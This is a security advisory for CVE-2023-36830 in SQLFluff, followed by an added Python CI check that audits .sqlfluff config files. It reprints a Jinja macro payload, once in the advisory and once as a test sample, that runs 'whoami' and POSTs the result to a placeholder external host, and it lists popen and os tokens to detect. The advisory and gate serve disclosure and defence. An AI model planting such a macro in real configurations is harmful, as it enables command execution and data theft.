CVE-2023-36830: SQLFluff users with access to config file, using `library_path` may call arbitrary Python code
In environments where untrusted users have access to the config files (e.g. .sqlfluff), there is a potential security vulnerability where those users could use the library_path config value to allow arbitrary Python code to be executed via macros. Jinja macros are executed within a sandboxed environment, but the following example shows how an external URL might be called and used to reveal internal information to an external listener:
[sqlfluff:templater:jinja]
library_path = /usr/lib/python3.9/http
[sqlfluff:templater:jinja:macros]
a_macro_def = {{client.HTTPSConnection('<SOME_EXTERNAL_SERVER_YOU_CONTROL>').request('POST', '/', server.os.popen('whoami').read())}}
For many users who use SQLFluff in the context of an environment where all users already have fairly escalated privileges, this may not be an issue - however in larger user bases, or where SQLFluff is bundled into another tool where developers still wish to give users access to supply their own rule configuration, this may be an issue.
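The practical defender's control here is to treat repository-supplied .sqlfluff files as untrusted input and gate them before SQLFluff ever runs. The following check is an added example written for this page, not code from the SQLFluff project: it parses a .sqlfluff file with Python's configparser (the format is INI-style, as the snippet above shows), flags any library_path under [sqlfluff:templater:jinja] that is not under an organisation allow-list (the allowed_roots parameter is an assumption of this example), and applies a simple substring heuristic (also an assumption) to macro bodies that reference os., popen( or dunder attributes. The two embedded configs are constructed samples; the vulnerable one mirrors the advisory's example with a placeholder host.

```python
"""CI gate for .sqlfluff files: flag jinja library_path settings and suspicious
macro bodies (CVE-2023-36830). Example code; not part of SQLFluff itself."""
import configparser
import sys
from pathlib import PurePosixPath

JINJA_SECTION = "sqlfluff:templater:jinja"
MACRO_SECTION = "sqlfluff:templater:jinja:macros"

# Heuristic (assumption): tokens that should never appear in a lint macro.
SUSPICIOUS_TOKENS = ("os.", "popen(", "subprocess", "__")

# Constructed sample mirroring the advisory's vulnerable configuration.
VULNERABLE_CONFIG = """
[sqlfluff:templater:jinja]
library_path = /usr/lib/python3.9/http

[sqlfluff:templater:jinja:macros]
a_macro_def = {{client.HTTPSConnection('listener.invalid').request('POST', '/', server.os.popen('whoami').read())}}
"""

# Constructed sample of an ordinary config that sets no library path.
SAFE_CONFIG = """
[sqlfluff]
dialect = postgres

[sqlfluff:templater:jinja:macros]
a_macro_def = {% macro greet(name) %}hello {{ name }}{% endmacro %}
"""


def parse_sqlfluff_config(text):
    """Parse INI-style .sqlfluff text. Interpolation is disabled so that the
    '%' characters in Jinja blocks are not treated as configparser syntax."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    return parser


def _under_allowed_root(path, allowed_roots):
    p = PurePosixPath(path)
    for root in allowed_roots:
        r = PurePosixPath(root)
        if p == r or r in p.parents:
            return True
    return False


def audit_config(text, allowed_roots=()):
    """Return a list of human-readable findings; an empty list means the file
    passes. allowed_roots is an allow-list (assumption) of directories from
    which a library_path may be loaded; the default of none flags every
    library_path, which is the safest posture for untrusted config files."""
    parser = parse_sqlfluff_config(text)
    findings = []

    if parser.has_option(JINJA_SECTION, "library_path"):
        path = parser.get(JINJA_SECTION, "library_path").strip()
        if not _under_allowed_root(path, allowed_roots):
            findings.append(
                f"[{JINJA_SECTION}] library_path = {path!r} is not on the allow-list; "
                "any Python module under it becomes callable from macros"
            )

    if parser.has_section(MACRO_SECTION):
        for name, body in parser.items(MACRO_SECTION):
            hits = [tok for tok in SUSPICIOUS_TOKENS if tok in body]
            if hits:
                findings.append(
                    f"[{MACRO_SECTION}] macro {name!r} references {hits}"
                )
    return findings


if __name__ == "__main__":
    # Usage: python gate.py path/to/.sqlfluff ; exits non-zero on findings.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else VULNERABLE_CONFIG
    for finding in audit_config(text):
        print("FINDING:", finding)
    sys.exit(1 if audit_config(text) else 0)
```

Run as a pre-commit or CI step, the gate fails the build on the advisory's configuration and passes an ordinary macro-only config; widening allowed_roots turns the library_path finding off while the macro heuristic still fires.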
References
- github.com/advisories/GHSA-jqhc-m2j3-fjrx
- github.com/pypa/advisory-database/tree/main/vulns/sqlfluff/PYSEC-2023-111.yaml
- github.com/sqlfluff/sqlfluff
- github.com/sqlfluff/sqlfluff/commit/6cdc38d76bedab4801b035c04d3c2b3aea17de86
- github.com/sqlfluff/sqlfluff/releases/tag/2.1.2
- github.com/sqlfluff/sqlfluff/security/advisories/GHSA-jqhc-m2j3-fjrx
- nvd.nist.gov/vuln/detail/CVE-2023-36830